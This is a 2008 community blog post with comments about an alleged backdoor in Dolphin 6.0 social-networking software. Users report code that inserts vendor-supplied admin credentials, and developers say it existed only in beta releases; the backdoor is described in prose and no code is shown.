A very serious security issue in version 6.0

dddd posted 4th of June 2008 in Community Voice. 6 comments.

There is a very serious security issue in version 6.0 of dolphin.

I am not sure if it's changed in recent versions, but requires immediate action.

I have started a blog on Dolphin issues and posting it there.

Please have a look

My blog on Dolphin issues

 

 
Comments
·Oldest
·Top
Please login to post a comment.
AndreyP
AndreyP4th of June 2008
 
Hello, we haven`t such embedded code, I recheck all revesions since 6.0, and we haven`t any same code

seems only you have same code

Regards
PermalinkReplyPlus0 pluses
SergeyZ
SergeyZ5th of June 2008
 
Hello!

Do not worry about this code. It was only in beta versions just for testing issues. It was removed in final release. Please upgrade your copy of Dolphin to the newer, more stable version. I recommend 6.1.1. ;)

Best Regards.

Sergey Z., Official Dolphin Developer.
PermalinkReplyPlus0 pluses
tango3d
tango3d5th of June 2008
 
I have saved all previous downloads of the dolphin script I have scanned all of them and found the same code here: Dolphin-v.6.0.0003-AdFree.zip
PermalinkReplyPlus0 pluses
mscott
mscott5th of June 2008
 
Let me translate what SergeyZ is saying... if you are using the older versions you DO have a backdoor!? I checked and it IS there!?
PermalinkReplyPlus0 pluses
gameutopia
gameutopia6th of June 2008
 
This is interesting, because I didn't know that my 6.03 version was a beta release version. And yes the code is difinately in 6.03.

I sure hope someone doesn't later post some decoded code that does something similar in 6.1x. I have noticed a number of encoded characters in 6.1x that I am not really sure what it does. I would be a little disappointed if any of it turned out to be something similar.

I am not ready to upgrade to 6.1.1 for a live site. I'd take the 6.03 I've been playing with see more over 6.1.1 for stability any day. I haven't had a single problem with it. I tried 6.1.1 and had a number of issues. Even reading the forums and blogs I see a lot of upgrade problems. Which makes me want to hold off a while yet. I'll continue testing it, but wont use it on a live site until a few things get fixed and worked out.
PermalinkReplyPlus0 pluses
dddd
dddd7th of June 2008to gameutopia
 
I think Boonex guys should honestly admit this. This code is obviously reading a file with admin login and pwd from their Boonex site and inserting it into your admin table. As you all know, an admin can do whatever he wants.

I think their solution was not that smart, because they left one line sql visible which inserts into admin table. Actually it is possible to do it in much smarter ways which are much more difficult to detect and claim.

I don't know how it is in the latest versions. I see more have no time to check newer versions, but if I find anything I am planning to post the details in my Dolphin blog

http://english.youshare.jp/blogs.php?action=show_member_blog&ownerID=15&category=32&cPath=32&blogID=7
PermalinkReplyPlus0 pluses
 
 
Home
Features
Pricing
Hosting
Support
About
StartDemo
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.

Blogs

Dolphin.Pro News
BoonEx News
Our Journey
Social Software World
Community Voice

Help

Support Forums
Documentation
BoonEx at GitHub
Custom Jobs
Contact Support Team

Product

Dolphin.Pro Features
Live Demo & Sandbox
Download Packages
Pricing & Order
Contact Sales Team

Company

Contact Us
About BoonEx
Privacy Policy
Terms & Conditions
© BoonEx Pty Ltd
SSL
© BoonEx
Home
Features
Pricing
Support
Hosting
About
Demo
PET:0.0642409324646